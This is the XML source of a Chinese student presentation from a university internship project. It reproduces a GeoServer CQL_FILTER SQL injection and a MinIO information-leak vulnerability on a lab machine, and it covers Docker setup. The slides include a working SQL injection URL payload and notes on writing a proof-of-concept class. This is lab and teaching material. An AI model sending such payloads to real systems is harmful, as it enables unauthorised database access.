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265" r:id="rId4"/>
    <p:sldId id="261" r:id="rId5"/>
    <p:sldId id="274" r:id="rId6"/>
    <p:sldId id="269" r:id="rId7"/>
    <p:sldId id="273" r:id="rId8"/>
    <p:sldId id="270" r:id="rId9"/>
    <p:sldId id="313" r:id="rId10"/>
    <p:sldId id="309" r:id="rId11"/>
    <p:sldId id="275" r:id="rId12"/>
    <p:sldId id="310" r:id="rId13"/>
    <p:sldId id="311" r:id="rId14"/>
    <p:sldId id="312" r:id="rId15"/>
    <p:sldId id="362" r:id="rId16"/>
    <p:sldId id="363" r:id="rId17"/>
    <p:sldId id="364" r:id="rId18"/>
    <p:sldId id="331" r:id="rId19"/>
    <p:sldId id="332" r:id="rId20"/>
    <p:sldId id="333" r:id="rId21"/>
    <p:sldId id="341" r:id="rId22"/>
    <p:sldId id="334" r:id="rId23"/>
    <p:sldId id="281" r:id="rId24"/>
    <p:sldId id="335" r:id="rId25"/>
    <p:sldId id="336" r:id="rId26"/>
    <p:sldId id="282" r:id="rId27"/>
    <p:sldId id="337" r:id="rId28"/>
    <p:sldId id="338" r:id="rId29"/>
    <p:sldId id="340" r:id="rId30"/>
    <p:sldId id="283" r:id="rId31"/>
    <p:sldId id="284" r:id="rId32"/>
    <p:sldId id="359" r:id="rId33"/>
    <p:sldId id="360" r:id="rId34"/>
    <p:sldId id="271" r:id="rId35"/>
    <p:sldId id="298" r:id="rId36"/>
    <p:sldId id="299" r:id="rId37"/>
    <p:sldId id="272" r:id="rId38"/>
    <p:sldId id="268" r:id="rId39"/>
    <p:sldId id="307" r:id="rId40"/>
    <p:sldId id="308" r:id="rId41"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId46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6" autoAdjust="0"/>
    <p:restoredTop sz="94694"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="81" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="864" y="72"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="38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10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1" descr="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="50028" b="13495"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-812800" y="2149475"/>
            <a:ext cx="4159885" cy="33902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" name="图片 10" descr="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect b="3900"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="961389" y="3518093"/>
            <a:ext cx="10433686" cy="36607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9" descr="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect t="6678" b="1167"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4766945" y="-391160"/>
            <a:ext cx="7797801" cy="33559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标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196340" y="6416675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/>
              <a:t>university.360.cn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" y="550734"/>
            <a:ext cx="1585452" cy="63418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/>
              <a:t>university.360.cn</a:t>
            </a:r>
            <a:endParaRPr sz="16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1739" y="6320292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7817226-A4A8-4CA8-8499-073E4B5E21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69579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CE3A6F2A-4BD1-4B71-A85C-4AC4B8E4C9A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4" y="236492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34"/>
          <p:cNvSpPr/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26448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1" y="170733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/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"/>
            <p:cNvSpPr/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/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/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/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/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/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/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/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5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图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="25965" t="26296"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11124826" y="0"/>
            <a:ext cx="1067174" cy="10647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10" descr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842" y="364340"/>
            <a:ext cx="548055" cy="57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8" descr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/>
              <a:t>university.360.cn</a:t>
            </a:r>
            <a:endParaRPr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hyperlink" Target="http://192.168.188.130:8080/geoserver/wfs?request=DescribeFeatureType&amp;version=2.0.0&amp;service=WFS&amp;outputFormat=application/json&amp;typeName=vulhub:exampl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hyperlink" Target="https://geoserver.org/download/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=834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705" y="252095"/>
            <a:ext cx="1214120" cy="1219835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="982663" y="1952625"/>
            <a:ext cx="10226675" cy="14763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</a:rPr>
              <a:t>南开大学第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>12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</a:rPr>
              <a:t>小组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82663" y="3429001"/>
            <a:ext cx="10226675" cy="11894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sz="2800" b="1" dirty="0"/>
              <a:t>新羽计划-南开大学实习实训</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>项目漏洞解析答辩</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>答辩小组成员：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常昊 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" dirty="0"/>
              <a:t>刘耀月</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" dirty="0"/>
              <a:t>牛雪力</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" dirty="0" err="1"/>
              <a:t>张永豪</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" dirty="0" err="1"/>
              <a:t>李金霖</a:t>
            </a:r>
            <a:endParaRPr kumimoji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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GeoServer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93800" y="1067435"/>
            <a:ext cx="7920355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2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2)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</a:rPr>
              <a:t>进入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>geoserver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1297535" y="1634837"/>
            <a:ext cx="7275657" cy="39041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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GeoServer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93800" y="1067435"/>
            <a:ext cx="7920355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2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2)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</a:rPr>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>GeoServer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</a:rPr>
              <a:t>中 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WFS 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</a:rPr>
              <a:t>服务的图层信息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r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng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http://192.168.188.130:8080/geoserver/ows?service=WFS&amp;version=1.0.0&amp;request=GetCapabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" u="sng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2464435" y="2150949"/>
            <a:ext cx="6413558" cy="36396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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GeoServer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93800" y="1067435"/>
            <a:ext cx="7920355" cy="12311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2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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获取某个图层的属性名称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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng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  <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>192.168.188.130:8080/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng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  <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>geoserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng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  <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng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  <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>wfs?request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng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  <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng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  <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>DescribeFeatureType&amp;version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng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  <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=2.0.0&amp;service=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng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  <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>WFS&amp;outputFormat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng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  <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng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  <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>json&amp;typeName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng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  <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng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  <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>vulhub:example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60306" y="2759301"/>
            <a:ext cx="9871388" cy="13393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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GeoServer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93800" y="1067435"/>
            <a:ext cx="7920355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2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4)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</a:rPr>
              <a:t>构造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payload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</a:rPr>
              <a:t>查询数据库版本信息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r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng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192.168.188.130:8080/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geoserver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/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ows?service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=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WFS&amp;version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=1.0.0&amp;request=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GetFeature&amp;typeName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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1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vulhub:example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&amp;CQL_FILTER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=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strStartsWith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sz="1800" b="1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name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charset="0"/>
              </a:rPr>
              <a:t>,%27x%27%27)%20=%20true%20and%201=(SELECT%20CAST%20((SELECT%20version())%20AS%20integer))%20--%20%27)%20=%20true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charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700"/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1265410" y="2883317"/>
            <a:ext cx="8545484" cy="24774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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GeoServer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93800" y="1067342"/>
            <a:ext cx="792035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zh-CN" sz="2800" kern="100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POC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插件编写</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" kern="100" dirty="0"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3165" y="1541780"/>
            <a:ext cx="9898380" cy="46570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漏洞利用步骤：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a. 构造恶意的CQL_FILTER参数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payload中构造了一个CQL_FILTER参数，其中的strStartsWith(name,'x''') = true and 1=(SELECT CAST ((SELECT version()) AS integer)) --' = true就是恶意构造的注入代码。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strStartsWith(name,'x''') = true这部分用于绕过字符串比较的检测。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1=(SELECT CAST ((SELECT version()) AS integer))这部分是实际的注入代码，它尝试执行SELECT version()来获取数据库版本信息。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b. 发送恶意请求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使用requests库发送GET请求，将payload作为查询参数。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请求的URL为Geoserver的地址，具体是http://192.168.188.130:8080/geoserver/ows。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c. 获取响应结果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通过调用response.text来获取服务器的响应内容，即注入漏洞后返回的结果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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GeoServer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375" y="847039"/>
            <a:ext cx="8800875" cy="55671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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GeoServer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048" y="1285471"/>
            <a:ext cx="9076207" cy="251481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0615" y="3954780"/>
            <a:ext cx="9462770" cy="1938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要将url 实例放入代码中，可以将这行代码放在POC类的构造方法中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比如如果想将url = "http://192.168.188.130:8080/geoserver/ows"放入代码中可以通过如下操作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在构造的类中定义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def __init__(self):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    super(GeoServerSQLiPOC, self).__init__()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    self.url = "http://192.168.188.130:8080/geoserver/ows"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这样，在创建GeoServerSQLiPOC类的实例时，url变量就会被赋值为指定的URL。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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2299335" y="1738630"/>
            <a:ext cx="424751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sz="4400" b="0" dirty="0"/>
              <a:t>项目实现过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
              <a:t>复盘</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641350" y="1738630"/>
            <a:ext cx="424751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en-US" altLang="zh-CN" sz="8800" dirty="0"/>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="8800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641350" y="4153535"/>
            <a:ext cx="6136005" cy="676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>
                <a:ln w="0" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="349E77"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="60000" endA="900" endPos="58000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
                <a:cs typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Process Replay</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400">
              <a:ln w="0" cap="rnd">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="349E77"/>
              </a:solidFill>
              <a:effectLst>
                <a:reflection blurRad="6350" stA="60000" endA="900" endPos="58000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
              </a:effectLst>
              <a:latin typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
              <a:cs typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204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365240" y="1931670"/>
            <a:ext cx="5089525" cy="4271010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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:def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139E4B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1pPr>
            <a:lvl2pPr marL="6858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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr kumimoji="0" lang="zh-CN" altLang="en-US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2pPr>
            <a:lvl3pPr marL="11430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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:def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3pPr>
            <a:lvl4pPr marL="16002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4pPr>
            <a:lvl5pPr marL="20574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CVE-2023-28432 MiniO信息泄露漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Online Reviewer System 1.0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821626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3800" y="1067435"/>
            <a:ext cx="8188498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sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>MiniO 是一个基于 Apache License v2.0 开源协议的对象存储服务。它兼容亚马逊 S3 云存储服务接口，非常适合于存储大容量非结构化的数据，例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等</a:t>
            </a:r>
            <a:endParaRPr sz="20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endParaRPr sz="20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r>
              <a:rPr sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在集群部署的 Minio 中，未授权的攻击者可发送恶意的 HTTP 请求来获取 Minio 环境变量中的敏感信息（MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD），可能导致攻击者以管理员权限登录 Minio，分布式部署的所有用户都会受到影响，单机用户没有影响</a:t>
            </a:r>
            <a:endParaRPr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878268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93800" y="1067435"/>
            <a:ext cx="792035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</a:rPr>
              <a:t>docker安装：</a:t>
            </a:r>
            <a:endParaRPr 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</a:rPr>
              <a:t>首先检查了 Docker 的版本，然后更新了软件包列表，并安装了最新版本的 Docker Compose 工具。 </a:t>
            </a:r>
            <a:endParaRPr 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endParaRPr lang="zh-CN" alt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2800" y="2082165"/>
            <a:ext cx="10158730" cy="42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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1558925" y="184975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sz="6000" dirty="0"/>
              <a:t>目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Contents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200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324600" y="1403985"/>
            <a:ext cx="5089525" cy="4271010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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:def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139E4B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1pPr>
            <a:lvl2pPr marL="6858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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr kumimoji="0" lang="zh-CN" altLang="en-US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2pPr>
            <a:lvl3pPr marL="11430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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:def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3pPr>
            <a:lvl4pPr marL="16002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4pPr>
            <a:lvl5pPr marL="20574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项目任务概述</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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项目小组分工及安排</a:t>
            </a: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项目实现过程复盘</a:t>
            </a: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遇到的问题及解决措施</a:t>
            </a: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1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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心得体会</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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0135" y="3961765"/>
            <a:ext cx="6136005" cy="676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 w="0" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="349E77"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:uFillTx/>
                <a:latin typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Contents</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4400" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0">
              <a:ln w="0" cap="rnd">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="349E77"/>
              </a:solidFill>
              <a:effectLst>
                <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
              </a:effectLst>
              <a:uFillTx/>
              <a:latin typeface="Lucida Handwriting" panose="03010101010101010101" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Lucida Handwriting" panose="03010101010101010101" charset="0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193800" y="389890"/>
            <a:ext cx="8362950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5015" y="1293495"/>
            <a:ext cx="5715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kumimoji="0" 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1335" y="1300480"/>
            <a:ext cx="9041130" cy="4255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、docker --version：这是用于检查已安装的 Docker 版本的命令。输出显示安装了 Docker 版本 20.10.24+dfsg1。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、apt-get update：这是用于更新软件包列表的命令。在这个命令中，使用了 Elastic Co. 的存储库（https://artifacts.elastic.co/packages/8.x/apt）和 Kali Linux 官方存储库（http://kali.download/kali kali-rolling）进行软件包的更新。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、apt install docker-compose：这是用于安装 Docker Compose 工具的命令。在这个命令中，通过包管理器 apt 安装了 Docker Compose。输出显示已经安装了最新版本的 Docker Compose（版本号为 1.29.2-3）。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833310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93800" y="1067435"/>
            <a:ext cx="792035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</a:rPr>
              <a:t>docker-compose安装：</a:t>
            </a:r>
            <a:endParaRPr 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</a:rPr>
              <a:t>     通过运行 docker-compose --version 命令检查了 Docker Compose 的版本，并且可以通过运行 docker-compose 命令来执行包括构建、启动、停止等操作的不同任务</a:t>
            </a:r>
            <a:endParaRPr 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endParaRPr lang="zh-CN" alt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6535" y="2362200"/>
            <a:ext cx="8757920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193800" y="389890"/>
            <a:ext cx="6798310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099820" y="965200"/>
            <a:ext cx="9605645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alibri Light" panose="020F0302020204030204" charset="0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Calibri Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、-f, --file FILE：指定使用的 compose 文件，默认为 docker-compose.yml。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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 Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、-p, --project-name NAME：指定项目的名称，默认为目录名称。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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 Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、--profile NAME：启用指定的配置文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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 Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、-c, --context NAME：指定上下文名称。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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 Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、--verbose：显示更多的输出信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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 Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、--log-level LEVEL：设置日志级别（DEBUG、INFO、WARNING、ERROR、CRITICAL）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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 Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、--ansi (never|always|auto)：控制是否打印 ANSI 控制字符。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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 Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、--no-ansi：不打印 ANSI 控制字符（已弃用）。</a:t>
            </a:r>
